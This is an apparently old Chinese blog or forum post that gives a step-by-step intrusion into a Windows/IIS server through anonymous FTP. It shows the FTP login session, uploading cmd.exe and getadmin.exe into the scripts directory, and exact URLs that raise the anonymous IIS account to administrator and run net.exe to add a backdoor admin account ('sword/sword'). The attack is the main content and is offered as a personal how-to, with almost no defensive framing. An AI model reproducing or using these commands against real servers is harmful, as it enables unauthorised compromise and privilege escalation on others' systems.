FTP匿名入侵
问我怎么进行FTP匿名入侵我才想起还有这种方式
复习简洁一番,总结了我的FTP匿名入侵经历,和大家分享:
假设一台电脑ip 192.188.0.183(这里用我自己的电脑实验)开放FTP服务
在”运行“里输入”CMD“
输入 ftp 192.188.0.183回车:
Connected to 192.188.0.183.
220 phoenix-r Microsoft FTP Service (Version 5.0).
User (192.188.0.183none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
password输入任何字符+@,是不显示的)
230-你好
230-欢迎来到lzbiz的FTP站点
230 User anonymous logged in.
FTP>
进入了
输入cd /script如果改变目录成功的话就有很大的胜算了
然后将自己的cmd.exe和getadmin.exe(一个提升权限的工具)复制到对方的scripts目录
用命令put就可以了
接着输入:
FTP>bye
221 拜拜,欢迎下次再来
退出了,呵呵,还欢迎我下次再来入侵
不知道大家看到没有,上面的一大段中出现了计算机名的----phoenix-r ,所以匿名用户的名称便是IUSR—
—phoenix-r (这是个常识)
然后在浏览器中输入http://192.188.0.183/scripts/getadmin.exe?iusr_phoenix-r
如果返回CGI Error
就已经成功地将IUSR——phoenix-r 提升为了管理员
然后添加用户:
http://192.188.0.183/scripts/cmd.exe?/c%20c://winnt//system32//net.exe%20sword%20sword%20/add
http://192.188.0.183/scripts/getadmin.exe?sword
这样我就添加了一个叫sword的密码也为sword用户
并提升权限为了管理员
这样就成功地入侵了
以上的前提是一些粗心的管理员没有禁止guest用户,而且匿名权限为”写入“
这样我才可以成功入侵,还有就是匿名帐号是anonymous
版权声明:本文为博主原创文章,未经博主允许不得转载。
页:
[1]